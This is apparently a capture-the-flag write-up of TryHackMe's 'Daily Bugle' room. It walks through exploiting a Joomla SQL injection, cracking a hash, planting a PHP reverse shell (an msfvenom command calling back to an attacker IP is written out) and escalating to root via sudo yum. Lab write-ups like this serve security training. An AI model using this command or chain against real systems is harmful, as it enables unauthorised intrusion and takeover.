Daily Bugle — TryHackMe

Port and service Enumeration
Using, nmap we discover ssh on port 22 and joomla CMS on port 80 and a MySQL server running on port 3306:

Analysing the endpoints found by nmap, I discover an administrator login page to manage the website:

I tested basic SQL injection on this form and a brute force attack with no success. As Joomla is a CMS, I used metasploit to determine the version.

Gaining a Foothold
Using searchsploit, I discover that an SQL injection was in the detected com_fields component(CVE-2017–8917) of Joomla version 3.7.0 :

I tried to use the metasploit module joomla_comfields_sqli_rce module to exploit this vulnerability, but it was not working. So I googled around and found a python script on GitHub(joomblah)that dumps a username and password hash from the database;

Using JohnTheRipper, I cracked this bcrypt hash and found the password:

I tried logging in into the MySQL server and through ssh, but it did not work. However, it worked on the administration page mention above:

Just like WordPress, Joomla can be exploited brought the plugins/templates that are installed on the website. In this instance, I exploited it by replacing the php code in the index.php by a reverse shell generated with msfvenom;
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.17.226 LPORT=4444 -f raw > shell.php

I used metasploit to set up a listener and got a connection back(could also have used netcat) :

Privilege Escalation
A quick look in the files present in the current directory reveals a configuration.php file containing a username and password that is used to connect to the MySQL server. I also checked what users were available on the system and found jjameson:

As it is so often the case, people tend to re-use the same password a lot, so I used these credentials to try and login through ssh, and it worked!

Checking what programs the current user can use as root reveals
/usr/bin/yum

Using the instructions at GTFObins, we create an interactive root shell by loading a custom plugin and retrieve the root flag and complete the challenge:

Thank you for reading this far !!